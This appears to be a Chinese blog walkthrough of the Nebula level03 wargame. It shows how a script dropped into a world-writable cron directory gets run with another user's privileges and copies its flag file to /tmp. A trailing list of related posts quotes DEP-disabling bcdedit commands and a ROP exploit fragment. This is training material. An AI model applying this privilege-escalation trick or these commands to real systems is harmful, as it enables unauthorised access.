i春秋 - Exploit-Exercises: Nebula - level03

原創 jchalex 2018-09-03 08:02

About

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

思路

先進flag文件夾看看

cd /home/flag03
vim writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
     (ulimit -t 5; bash -x "$i")
     rm -f "$i"
done

程序邏輯

依次執行writable.d文件夾下的所有腳本,然後刪除

根據題目可知系統會每隔幾分鐘執行writable.sh腳本,並且writable.d文件夾是所有人可寫的。那麼獲取flag的思路之一,便可以是寫一個獲取flag的腳本放進writable.d文件夾裏,執行結果重定向到/tmp中文件。

cd /tmp
vim hack
cat /home/flag03/flag > /tmp/flag03
chmod 755 hack
mv hack /home/flag03/writable.d/
cat /tmp/flag03

As for the time, good luck for you!

flag

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Adobe PDF LibTiff Integer Overflow CVE-2010-0188分析

一,TIFF圖像格式介紹 TIFF文件分爲文件頭IFH和IFD兩部分。 IFH結構見下圖: 共有8字節。其中 0-1 規定爲“II”或“MM”,Intel/Mortorola類型的字節序列 2-3 TIFF版本號,爲向下兼容,值爲42

p0x1307 2020-07-05 19:06:34

論文閱讀:KOOBE: Towards Facilitating Exploit Generation of Kernel Out-Of-Bounds Write Vulnerabilities

Usenix Security 2020 的一篇關於內核OOB漏洞自動化利用的文章,感覺寫的不錯。 文章目錄簡介研究背景研究方法研究假設核心思想實現測試評估總結 簡介 這篇文章的主要目的是爲了評估堆溢出漏洞的可利用性,從而方便

破落之实 2020-07-03 23:25:39

nebula level18

About Analyse the C program, and look for vulnerabilities in the program. There is an easy way to solve this level, an

陈阿福 2020-06-29 11:24:59

Nebula level16

http://www.exploit-exercises.com/nebula/level16 About There is a perl script running on port 1616. To do this level,

陈阿福 2020-06-29 10:40:49

黑客入門之fusion level02

本文轉自下面的鏈接 https://qqp.ca/2013/07/15/fusion-level-02.html 對最後的exploit 中的payload2做了小小的修改,可以得到shell。 Level 02 introduces n

陈阿福 2020-06-29 10:40:48

黑客入門之fusion level01

http://exploit-exercises.com/fusion/level01 About level00 with stack/heap/mmap aslr, without info leak :) Vulnerabilit

陈阿福 2020-06-29 10:40:48

pwnable.kr - fd

題目: 題目鏈接:http://pwnable.kr/play.php ——> 連接登錄: ssh [email protected] -p2222 查看文件及權限: ls -al 看到flag文件,但是當前用戶fd並沒有讀

jchalex 2020-06-29 07:47:26

命令行下修改DEP

bcdedit.exe /set nx OptIn bcdedit.exe /set nx OptOut bcdedit.exe /set nx AlwaysOn bcdedit.exe /set nx AlwaysOff

sam20151111sam 2020-06-27 11:30:46

如何查看程序是否支持ASLR

使用工具PE EXPLOER打開,查看DllCharacteristics是否包含0x40就可以知道是否支持ASLR

sam20151111sam 2020-06-27 11:30:45

Easy RM to Mp3 Converter測試rop的代碼

my $file="rop.m3u"; my $buffersize=26094-20-8-4; my $junk="A"x$buffersize;

sam20151111sam 2020-06-27 11:30:45

合天網安實驗室CTF-Exp200-Come on,Exploit me!

合天網安實驗室CTF-Exp200-Come on,Exploit me! 題目描述   Audrey Tang. ⊙.⊙ 我只能說到這兒了 相關附件   exp200 參考解題步驟 1、下載附件先用VSCode打開看看 換個

皮卡皮卡~ 2020-06-27 04:27:26

WinXP/Win7/Win8通用shellcode

轉自http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5 衆所周知,在windows xp時代未啓用ASLR(Address space layout randomizat

SauceJ 2020-06-13 08:31:30

shellcode轉換成彙編代碼

方法1:提取ShellCode中的機器碼---->把機器碼粘貼到WinHEX並保存成exe文件---->用C32Asm反彙編---->得到反彙編碼。 方法2:提取ShellCode中的機器碼---->用OllyDBG隨便打開一個exe程序

SauceJ 2020-06-13 08:31:20

從零開始學Fuzzing系列:瀏覽器挖掘框架Morph誕生記

lanceleo 2020-06-02 06:37:28

PE文件基址重定位

SauceJ 2020-02-26 01:27:20